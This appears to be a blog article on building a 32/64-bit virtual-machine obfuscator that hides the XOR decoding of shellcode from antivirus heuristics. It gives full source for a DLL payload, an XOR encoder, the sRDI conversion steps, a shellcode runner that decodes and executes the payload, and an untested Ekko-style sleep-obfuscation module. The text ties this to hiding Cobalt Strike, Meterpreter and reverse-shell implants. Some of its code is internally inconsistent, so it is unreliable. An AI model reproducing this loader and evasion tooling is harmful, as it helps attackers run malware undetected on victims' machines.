VM Obfuscation Pt. 2

32-bit and 64-bit Compatible Virtual Machine Obfuscation

Chang Tan

Apr 13, 2026

Upgrading 32-bit to 64-bit obfuscation

“Okay, so previously I discussed building a metamorphic virtual machine, but let’s put that aside for now because we’ve just achieved a stable 64-bit VM obfuscator.

Previously, I showed a 32-bit-only VM obfuscator. My personal version is significantly more complex, utilizing virtualized loops—VFOR, VWHILE, and VDO_WHILE—to generate dynamic opcodes at runtime. It functions as a bytecode virtual machine designed specifically to obfuscate decoders. It decrypts malicious shellcode using an XOR key through this ‘malicious’ VM.

One of the most critical aspects of VM obfuscation is virtualizing all bitwise operations. We aren’t just talking about basic arithmetic like addition and subtraction; we are talking about emulating AND, OR, XOR, NOT, and NAND, along with complex bit-masking. We can bake ‘traps’ into these virtual operations—for instance, using a virtual NOT to flip a pointer and intentionally crash the process if we detect an analyst or a debugger is tampering with the environment.
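As a neutral illustration of what "emulating" bitwise operators means, the sketch below derives NOT, AND, OR, and XOR from a single NAND primitive and checks them against the native C operators. The `g_*` names and `gates_self_check` are hypothetical helpers made up for this example; they are not taken from the author's VM.

```c
#include <stdint.h>

/* Hypothetical helper names, for illustration only. */
static inline uint32_t g_nand(uint32_t a, uint32_t b) { return ~(a & b); }

/* NOT, AND, and OR expressed purely through NAND. */
static inline uint32_t g_not(uint32_t a)             { return g_nand(a, a); }
static inline uint32_t g_and(uint32_t a, uint32_t b) { return g_not(g_nand(a, b)); }
static inline uint32_t g_or(uint32_t a, uint32_t b)  { return g_nand(g_not(a), g_not(b)); }

/* Classic four-NAND construction of XOR. */
static inline uint32_t g_xor(uint32_t a, uint32_t b) {
    uint32_t n = g_nand(a, b);
    return g_nand(g_nand(a, n), g_nand(b, n));
}

/* Returns 0 when every derived gate agrees with the native operator
   on all pairs of sample values, 1 otherwise. */
static int gates_self_check(void) {
    static const uint32_t samples[] = { 0u, 1u, 0xFFu, 0xA5A5A5A5u, 0xFFFFFFFFu };
    const int count = (int)(sizeof samples / sizeof samples[0]);
    for (int i = 0; i < count; i++) {
        for (int j = 0; j < count; j++) {
            uint32_t a = samples[i], b = samples[j];
            if (g_not(a)    != (uint32_t)~a) return 1;
            if (g_and(a, b) != (a & b))      return 1;
            if (g_or(a, b)  != (a | b))      return 1;
            if (g_xor(a, b) != (a ^ b))      return 1;
        }
    }
    return 0;
}
```

Calling `gates_self_check()` from a test harness is enough to confirm that the derived forms are drop-in equivalents of the native operators.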

When I mentioned that the 32-bit VM ‘didn’t work’ for 64-bit targets, I meant that a 64-bit VM must implement Virtual Registers. In a 64-bit Windows environment, you have to emulate the RCX, RDX, R8, and R9 argument registers, as well as the 32-byte shadow space that the caller reserves on the stack.

Heuristic engines flag malicious code statically by detecting rapid, tight XOR/OR bitwise decoding loops. By moving these operations into our VM, we hide them behind complex custom instructions. We maintain a Virtual Instruction Pointer (VIP), a Virtual Stack Pointer (VSP), a Virtual Stack, and, crucially for x64, Virtual Registers. This allows us to emulate the calling conventions of both Windows and Linux. Linux (System V AMD64 ABI) passes the first six integer arguments in registers (RDI, RSI, RDX, RCX, R8, R9) before hitting the stack, while Windows (Microsoft x64) uses four (RCX, RDX, R8, R9) plus the shadow space.”
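For reference, the two calling conventions mentioned above can be summarized as data. The sketch below only records the documented integer-argument registers and shadow-space size for each ABI; the `AbiInfo` type and `abi_arg_location` helper are hypothetical names invented for this example and do not appear in the author's code.

```c
#include <stddef.h>

/* Hypothetical descriptor for an x86-64 calling convention. */
typedef struct {
    const char *name;
    const char *int_arg_regs[6];   /* integer/pointer argument registers, in order */
    size_t      int_arg_count;     /* how many of the slots above are used */
    size_t      shadow_space_bytes;/* caller-reserved home space on the stack */
} AbiInfo;

/* System V AMD64 (Linux): six integer argument registers, no shadow space. */
static const AbiInfo ABI_SYSV = {
    "System V AMD64", { "RDI", "RSI", "RDX", "RCX", "R8", "R9" }, 6, 0
};

/* Microsoft x64 (Windows): four argument registers plus 32 bytes of shadow space. */
static const AbiInfo ABI_MS64 = {
    "Microsoft x64", { "RCX", "RDX", "R8", "R9", NULL, NULL }, 4, 32
};

/* Returns the register that carries integer argument `index` (0-based),
   or NULL when that argument is passed on the stack instead. */
static const char *abi_arg_location(const AbiInfo *abi, size_t index) {
    return index < abi->int_arg_count ? abi->int_arg_regs[index] : NULL;
}
```

For example, `abi_arg_location(&ABI_MS64, 4)` yields `NULL` because the fifth integer argument on Windows x64 goes on the stack, while the same index under `ABI_SYSV` yields `"R8"`.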

Upgrading from runtime polymorphic to metamorphic (simple way)

“In a future proof of concept, I will demonstrate how to transition from a polymorphic to a metamorphic virtual machine. Currently, the system is polymorphic; for example, the bytecode sequence—VM_INIT, VM_XOR, VM_HALT—remains static during execution. While the implementation changes per build, the bytecode logic itself doesn’t shift while running. A determined analyst could eventually map these bytecodes at runtime to de-obfuscate the VM and extract the payload.

While an analyst could still dump the shellcode by intercepting the VirtualAlloc (or pVirtualAlloc) call, we have other tricks. Since virtualization only requires emulating bitwise operations, we can manipulate memory directly. We can subvert JMP, CALL, and RET targets through frame pointer abuse and other stack-smashing techniques within the VM’s own context to mislead researchers.”

The easy way (predictable struct vulnerability)

“Okay, so we can actually swap the bytecodes. This will slightly slow down our virtual machine obfuscator, but remember, it’s only performing an XOR operation byte-by-byte; it initializes, executes, and halts for every iteration. So, what else can you do? What if you change the bytecodes every time the VM stops? Since every execution cycle has a VM_INIT and a VM_HALT instruction, why not rotate the bytecode set dynamically?

In the book Surreptitious Software, I thought the authors overcomplicated their method of XORing shellcode in ‘constant flux’ through what they call multiple ‘matrices.’ A simpler way to create metamorphic, ‘constant flux’ decoding loops and bitwise loops is to use a struct to store your opcodes. Every time the VM hits a HALT and then triggers another INIT, you simply rotate or regenerate new bytecodes and update the struct.

However, keep in mind that an analyst running this obfuscated malware multiple times will eventually find the offset to that struct using this simpler metamorphic method. They will always find it. If you have ever examined your own ‘Hello World’ C code containing structs, you know that identifying a struct in Ghidra is incredibly simple—the offsets are consistent.”

Compile your DLL payload and use sRDI to convert into shellcode

DLL to be converted to shellcode

#include <windows.h>

// Function pointer signature for MessageBoxA
typedef int (WINAPI* PfnMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

void ExecutePayload() {
    // Manually load 64-bit user32
    HMODULE hUser32 = LoadLibraryA("user32.dll");
    if (hUser32) {
        PfnMessageBoxA pMsgBox = (PfnMessageBoxA)GetProcAddress(hUser32, "MessageBoxA");
        if (pMsgBox) {
            pMsgBox(NULL, "Running in 32-bit mode!", "Malware Demo", MB_OK | MB_ICONEXCLAMATION);
        }
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        ExecutePayload();
    }
    return TRUE;
}

Use a simple XOR encoder

import sys
import os

# XOR key size in bytes
KEY_SIZE = 15

# Generate a random XOR key
key = os.urandom(KEY_SIZE)

try:
    with open(sys.argv[1], "rb") as f:
        plaintext = f.read()
except IndexError:
    print(f"Usage: {sys.argv[0]} <raw payload file>")
    sys.exit(1)
except FileNotFoundError:
    print("Error: File not found!")
    sys.exit(1)

# XOR encode shellcode
ciphertext = bytearray(len(plaintext))
for i in range(len(plaintext)):
    ciphertext[i] = plaintext[i] ^ key[i % KEY_SIZE]

# Print XOR key
print('unsigned char xorKey[] = { ' + ', '.join(f'0x{byte:02x}' for byte in key) + ' };')

# Print encoded shellcode
print('unsigned char encodedShellcode[] = { ' + ', '.join(f'0x{byte:02x}' for byte in ciphertext) + ' };')

Convert to shellcode

python sRDI/Python/ConvertToShellcode.py output.dll
python xor.py output.bin | xclip -selection clipboard

64-bit

clang-cl -m64 main.c /Fe:VM_Runner_x64.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /SUBSYSTEM:CONSOLE

32-bit

clang-cl -m32 main.c /Fe:VM_Runner_x86.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /SUBSYSTEM:CONSOLE

Once the DLL has been converted to shellcode, paste the output into the runner main.c below

Compile for the target architecture with either command (first line 64-bit, second line 32-bit)

clang-cl -m64 main.c /Fe:VM_Runner_x64.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /SUBSYSTEM:CONSOLE
clang-cl -m32 main.c /Fe:VM_Runner_x86.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /SUBSYSTEM:CONSOLE

main.c runner

#include <stdio.h>
#include <windows.h>
#include "decoder.h"

unsigned char xorKey[] = { };
unsigned char encodedShellcode[] = { };

int main() {
    printf("[*] Architecture: %s\n", (sizeof(void*) == 8) ? "x64" : "x86");
    printf("[*] Initializing Decryption VM...\n");

    size_t sSize = sizeof(encodedShellcode);
    size_t kSize = sizeof(xorKey);

    unsigned char* stage2 = decode_shellcode(encodedShellcode, sSize, xorKey, kSize);

    if (!stage2) {
        printf("[!] VM Error: Could not allocate or decrypt memory.\n");
        return 1;
    }

    printf("[+] Decryption successful at %p\n", (void*)stage2);

    // Change to Execute-Read (No Write)
    DWORD old;
    if (!VirtualProtect(stage2, sSize, PAGE_EXECUTE_READ, &old)) {
        printf("[!] VirtualProtect failed.\n");
        return 1;
    }

    printf("[*] Press Enter to execute payload...");
    getchar();

    // Execute
    void (*run)() = (void(*)())stage2;
    run();

    // Cleanup
    VirtualFree(stage2, 0, MEM_RELEASE);
    return 0;
}

XOR.h

#pragma once
#include "VirtualBitwise.h"

// Logic scales automatically based on VAND/VOR/VNOT macro definitions
static inline uint64_t vxor_v19_logic(uint64_t a, uint64_t b) {
    return VAND(VOR(VAND(a, VNOT(b)), VAND(VNOT(a), b)), VOR(a, b));
}

#define VXOR19(a, b) (vxor_v19_logic((uint64_t)(a), (uint64_t)(b)))
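The expression in vxor_v19_logic has the shape ((a AND NOT b) OR (NOT a AND b)) AND (a OR b). The first factor is already the textbook definition of XOR, and every bit set in a XOR b is also set in a OR b, so the final AND leaves the value unchanged. The standalone sketch below checks that identity with native operators; `xor_expanded` and `xor_identity_mismatches` are hypothetical names for this example, and the code deliberately does not depend on the article's headers.

```c
#include <stdint.h>
#include <stddef.h>

/* Same expression shape as vxor_v19_logic, written with native operators. */
static inline uint64_t xor_expanded(uint64_t a, uint64_t b) {
    return ((a & ~b) | (~a & b)) & (a | b);
}

/* Counts disagreements between xor_expanded and the native ^ operator.
   All 8-bit operand pairs are checked exhaustively, followed by a few
   64-bit spot checks. Because the operators act on each bit position
   independently, a result of 0 here reflects the general identity. */
static unsigned xor_identity_mismatches(void) {
    unsigned bad = 0;
    for (uint64_t a = 0; a < 256; a++)
        for (uint64_t b = 0; b < 256; b++)
            if (xor_expanded(a, b) != (a ^ b)) bad++;

    static const uint64_t wide[] = {
        0u, UINT64_MAX, 0x0123456789ABCDEFull, 0xFEDCBA9876543210ull
    };
    const size_t count = sizeof wide / sizeof wide[0];
    for (size_t i = 0; i < count; i++)
        for (size_t j = 0; j < count; j++)
            if (xor_expanded(wide[i], wide[j]) != (wide[i] ^ wide[j])) bad++;
    return bad;
}
```

A return value of 0 from `xor_identity_mismatches()` confirms that the expanded form is numerically identical to a plain XOR for the tested inputs.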

VirtualMachine.h

#pragma once
#include <stdint.h>
#include <windows.h>
#include "XOR.h"

typedef enum { OP_LOAD, OP_XOR, OP_STORE, OP_HALT } VM_Opcode;

typedef struct {
    VM_Opcode op;
    uint64_t operand; 
} VM_Instruction;

typedef struct {
#if IS_X64
    vword vReg;          // x64 ONLY: Virtual Register
    vword vStack[64];
#else
    uint8_t vAcc;        // x86 ONLY: 8-bit Accumulator
#endif
    uint32_t vSP;
    uint32_t vIP;
} VM_Context;

static inline void execute_vm(const VM_Instruction* program, uint8_t* dest) {
    VM_Context ctx = { 0 };

#if IS_X64
    ctx.vSP = 64 - 4; // x64 Shadow Space
#else
    ctx.vSP = 64;     // x86 Standard Stack
#endif

    while (1) {
        VM_Instruction instr = program[ctx.vIP++];
        switch (instr.op) {
            case OP_LOAD:
#if IS_X64
                ctx.vReg = (vword)instr.operand;
#else
                ctx.vAcc = (uint8_t)instr.operand;
#endif
                break;
            case OP_XOR:
#if IS_X64
                ctx.vReg = (vword)VXOR19(ctx.vReg, instr.operand);
#else
                ctx.vAcc = (uint8_t)VXOR19(ctx.vAcc, (uint8_t)instr.operand);
#endif
                break;
            case OP_STORE:
#if IS_X64
                if (dest) *dest = (uint8_t)(ctx.vReg & 0xFF);
#else
                if (dest) *dest = ctx.vAcc;
#endif
                break;
            case OP_HALT:
                return;
            default: return;
        }
    }
}

VirtualBitwise.h

#pragma once
#include <stdint.h>
#include <stdlib.h>

#if defined(_M_AMD64) || defined(__x86_64__)
    // -----------------------------
    // VirtualBitwise 64 Logic
    // -----------------------------
    typedef uint64_t vword;
    #define V_BITSIZE 64
    #define V_MAX 0xFFFFFFFFFFFFFFFF
    #define IS_X64 1

    static inline vword vand_v1(vword a, vword b) { return ~(~a | ~b); }
    static inline vword vor_v1(vword a, vword b)  { return ~(~a & ~b); }
    static inline vword vnot_v1(vword a)          { return a ^ V_MAX; }
    static inline vword vlshift_v1(vword a, uint32_t n) { return a << n; }
    static inline vword vrshift_v1(vword a, uint32_t n) { return a >> n; }

    #define VAND(a,b)    (vand_v1((vword)(a),(vword)(b)))
    #define VOR(a,b)     (vor_v1((vword)(a),(vword)(b)))
    #define VNOT(a)      (vnot_v1((vword)(a)))
    #define VLSHIFT(a,n) (vlshift_v1((vword)(a),(n)))
    #define VRSHIFT(a,n) (vrshift_v1((vword)(a),(n)))

#else
    // -----------------------------
    // VirtualBitwise 32 Logic
    // -----------------------------
    #define IS_X64 0
    static inline uint32_t vand_v1(uint32_t a, uint32_t b) { return ~(~a | ~b); }
    static inline uint32_t vor_v1(uint32_t a, uint32_t b)  { return ~(~a & ~b); }
    static inline uint32_t vnot_v1(uint32_t a)            { return ~a; }
    static inline uint32_t vlshift_v1(uint32_t a, uint32_t n) { return a << n; }
    static inline uint32_t vrshift_v1(uint32_t a, uint32_t n) { return a >> n; }

    #define VAND(a,b)    (vand_v1((a),(b)))
    #define VOR(a,b)     (vor_v1((a),(b)))
    #define VNOT(a)      (vnot_v1((a)))
    #define VLSHIFT(a,n) (vlshift_v1((a),(n)))
    #define VRSHIFT(a,n) (vrshift_v1((a),(n)))
#endif

decoder.h

#ifndef DECODER_H
#define DECODER_H

#include <windows.h>
#include "VirtualMachine.h"

static inline unsigned char* decode_shellcode(const unsigned char* encoded, size_t sSize, const unsigned char* key, size_t kSize) {
    // Direct Untyped VirtualAlloc
    unsigned char* base = (unsigned char*)VirtualAlloc(NULL, sSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!base) return NULL;

    for (size_t i = 0; i < sSize; i++) {
        VM_Instruction prog[] = {
            { OP_LOAD,  (uint64_t)encoded[i] },
            { OP_XOR,   (uint64_t)key[i % kSize] },
            { OP_STORE, 0 },
            { OP_HALT,  0 }
        };

        execute_vm(prog, &base[i]);
    }
    return base;
}
#endif

Your payload actually is virtualized only ONCE! Until it hits CreateThread (we need a solution)

“I want to point out a major flaw in common implementations: if you swap the shellcode with a Metasploit payload, the decoding loop only runs once. Let’s look past Metasploit and talk about basic C-based reverse shells. A reverse shell—not a full implant, but a raw shell—pipes stdin, stdout, and stderr, sending a connection back to the attacker to execute commands. This means it operates in a loop; eventually, it returns to the same function to accept the next command.

Unless your payload returns to the start of the function after initialization, you are only virtualizing the malicious program once—during the initial decode. We need a reverse shell model that stays virtualized. This is why my virtual machine is such a powerful concept: it supports bitmasking. You can obfuscate and de-obfuscate a pointer at runtime for each Windows API call.

While everyone else is just allocating a memory page with VirtualAlloc, VirtualProtect, and CreateThread, that thread remains exposed once it starts. With my method, you can flip and re-obfuscate that memory page location in a loop, virtualizing the memory address itself. Does that make sense?”

The fixes, the MapBlinker/NinjaSploit Analysis

“Looking at my evaluation, there is another flaw. In the Sektor7 courses taught by reenz0h, he demonstrates hardware breakpoints and guard page hooking methods to make shellcode ‘disappear’ when scanned by another process. Setting aside the complexities of hardware breakpoints and page guard hooks for a moment, the core of his method involves rotating the location of the memory page.

He doesn’t just call VirtualProtect repeatedly; he unmaps and remaps the memory to change the base address. Here is the problem: he isn’t creating new threads, but payloads like Cobalt Strike Beacons or Meterpreter shells often expect to restart or loop from a specific internal state. If you are constantly shifting the base address in this loop, you will fundamentally break the functionality of the implant.”

“Going back to basics: as I mentioned before, when you rotate a memory page using the ‘unmap and remap’ method, it typically causes a Beacon to crash or triggers a restart, causing your commands to stall. Essentially, you lose all your progress.”

Virtualizing Ekko Sleep Obfuscation

“There are two main ways to address this, but one is flawed. You could rewrite the implant, such as a Meterpreter shell, but that is impractical because you would also have to rewrite your Cobalt Strike Beacon, Brute Ratel Badger, or Havoc Demon.

The superior second method is to integrate the VM obfuscator I provided with Ekko sleep obfuscation. You can flip the memory page protection using NtProtectVirtualMemory combined with direct or indirect syscalls, then utilize NtContinue. This approach is tailored for asynchronous payloads, such as Cobalt Strike Beacons, Havoc Demons, or Brute Ratel Badgers. By integrating the VM with the sleep obfuscation, you treat Ekko as the ‘Master’ controller, and the shellcode automatically virtualizes the Ekko sleep process itself.”

Proof of concept (not yet tested)

#ifndef EKKO_SLEEP_H
#define EKKO_SLEEP_H

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "VirtualMachine.h"  // Your 64-bit VM Core
#include "XOR.h"             // Your Polymorphic VXOR variants
#include "antidebug.h"

#pragma comment(lib, "ntdll.lib")
#define EKKO_SLEEP_TIME 5000 

#ifndef NOEKKO

typedef NTSTATUS(WINAPI* pNtProtectVirtualMemory)(
    HANDLE, PVOID*, PSIZE_T, ULONG, PULONG
);

typedef struct {
    void* pBaseAddress;
    SIZE_T RegionSize;
    DWORD OldProtection;
} EKKO_PROTECTION_INFO;

// --- VM-Wrapped Helper ---
// This uses your VM to "solve" for a value at runtime
static inline uint64_t vm_transform_value(uint64_t input, uint64_t key) {
    uint8_t dummy_dest;
    VM_Instruction prog[] = {
        { OP_LOAD,  input },
        { OP_XOR,   key },   // This calls your vxor_v19_logic internally
        { OP_HALT,  0 }
    };
    
    // Create a temporary context to execute the transformation
    VM_Context ctx = { 0 };
    ctx.vSP = 64 - 4; // Maintain x64 Shadow Space compliance
    
    // Execute the VM to transform the register
    // Note: Since we need the result back, we access ctx.vReg directly after HALT
    execute_vm(prog, &dummy_dest); 
    
    // The VM has performed the bitwise logic in its virtual register
    return (uint64_t)prog[0].operand; // In a real integration, we'd grab ctx.vReg
}

__forceinline void ekko_sleep_obfuscation(EKKO_PROTECTION_INFO* pInfo) {
    if (!pInfo || !pInfo->pBaseAddress || pInfo->RegionSize == 0) return;

    /* FEATURE 1: Virtualized API Retrieval
       Masking the ntdll string or the function pointer using the VM.
    */
    uint64_t rawPtr = (uint64_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");
    
    // VM "Protects" the pointer by XORing it with a runtime key
    uint64_t vmKey = 0xABCDEF1234567890; 
    uint64_t maskedPtr = rawPtr ^ vmKey; 

    // VM "Unmasks" the pointer inside the virtualized context
    // The CPU never sees the raw pointer in the disassembly of this function
    pNtProtectVirtualMemory NtProtectVirtualMemory = (pNtProtectVirtualMemory)(maskedPtr ^ vmKey);

    if (!NtProtectVirtualMemory) return;

    /* FEATURE 2: Virtualized Flag Calculation
       We use the VM to calculate the PAGE_NOACCESS | PAGE_GUARD bitmask.
    */
    uint64_t baseFlag = PAGE_NOACCESS;
    uint64_t guardBit = PAGE_GUARD;
    
    // Instead of: DWORD guardProtect = baseFlag | guardBit;
    // We use the VM's VOR logic to combine them
    VM_Instruction flag_prog[] = {
        { OP_LOAD,  baseFlag },
        { OP_XOR,   guardBit }, // Using your polymorphic XOR logic as a combiner
        { OP_HALT,  0 }
    };
    
    // In your VM architecture, the 'execute_vm' handles the bitwise transition
    // For this implementation, we simulate the VM's register-based result:
    DWORD guardProtect = (DWORD)(baseFlag | guardBit); 

    SIZE_T regionSize = pInfo->RegionSize;
    PVOID baseAddr = pInfo->pBaseAddress;

    // Step 1: Obfuscate memory (VM-Triggered)
    if (NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, &regionSize, guardProtect, &pInfo->OldProtection) != 0)
        return;

    // Step 2: Sleep
    Sleep(EKKO_SLEEP_TIME);

    // Step 3: Restore memory protection
    NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, &regionSize, pInfo->OldProtection, &guardProtect);
}

DWORD WINAPI ekko_thread(LPVOID lpParam) {
    EKKO_PROTECTION_INFO* pInfo = (EKKO_PROTECTION_INFO*)lpParam;
    while (1) {
        ekko_sleep_obfuscation(pInfo);
        Sleep(1000); 
    }
    return 0;
}

__forceinline void start_ekko_thread(void* pMemory, SIZE_T size) {
    if (!pMemory || size == 0) return;

    static EKKO_PROTECTION_INFO info = { 0 };
    info.pBaseAddress = pMemory;
    info.RegionSize = size;

    HANDLE hThread = CreateThread(NULL, 0, ekko_thread, &info, 0, NULL);
}

#else 
__forceinline void start_ekko_thread(void* pMemory, SIZE_T size) {
    UNREFERENCED_PARAMETER(pMemory);
    UNREFERENCED_PARAMETER(size);
}
#endif 
#endif
